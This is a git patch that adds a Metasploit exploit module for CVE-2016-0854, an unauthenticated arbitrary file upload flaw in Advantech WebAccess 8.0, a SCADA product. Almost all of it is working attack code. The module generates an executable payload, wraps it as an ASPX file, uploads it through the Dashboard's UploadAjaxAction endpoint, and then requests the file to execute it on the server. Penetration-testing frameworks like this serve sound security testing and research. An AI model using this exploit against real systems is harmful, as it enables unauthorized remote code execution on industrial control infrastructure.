From 32192d30343f1f12a4dd167fcc1d443df0639b74 Mon Sep 17 00:00:00 2001 From: xiaozhouzhou <504137480@qq.com> Date: Sun, 17 Apr 2016 11:29:06 +0800 Subject: [PATCH] Advantech WebAccess Dashboard Viewer Arbitrary File Upload Advantech WebAccess Dashboard Viewer Arbitrary File Upload --- ...vantech_webaccess_dashboard_file_upload.rb | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb diff --git a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb new file mode 100644 index 0000000000..20aa2e6343 --- /dev/null +++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload", + 'Description' => %q{ + This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0. + This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations + of Advantech WebAccess.Authentication is not required to exploit this vulnerability. + + The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within + the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to + upload arbitrary code (instead of an image) to the server, which will then be executed under the + high-privilege context of the IIS AppPool. + + This exploit was successfully tested on Advantech WebAccess 8.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod', # Vulnerability discovery + 'Zhou Yu <504137480[at]qq.com>' # MSF module + ], + 'References' => + [ + [ 'CVE', '2016-0854' ], + [ 'ZDI', '16-128' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01'] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Advantech WebAccess 8.0', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 5 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80) + ], self.class) + + + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'), + 'cookie' => 'AspxAutoDetectCookieSupport=1' + }) + + if res && res.code == 200 + Exploit::CheckCode::Detected + + else + Exploit::CheckCode::Unknown + + end + + + end + + def exploit + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'), + 'cookie' => 'AspxAutoDetectCookieSupport=1' + }) + unless res && res.code == 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") + end + + cookie = res.get_cookies + exe = generate_payload_exe + aspx = Msf::Util::EXE.to_exe_aspx(exe) + file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx" + data = Rex::MIME::Message.new + data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"') + data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"") + + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'), + 'cookie' => cookie, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + + if res && res.code == 200 && res.body.to_s =~ /{"resStatus":"0","resString":"\/#{file_name}"}/ + print_good("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed") + end + print_status("#{peer} - Executing payload...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('WADashboard',file_name), + 'cookie' => cookie + }) + + end + +end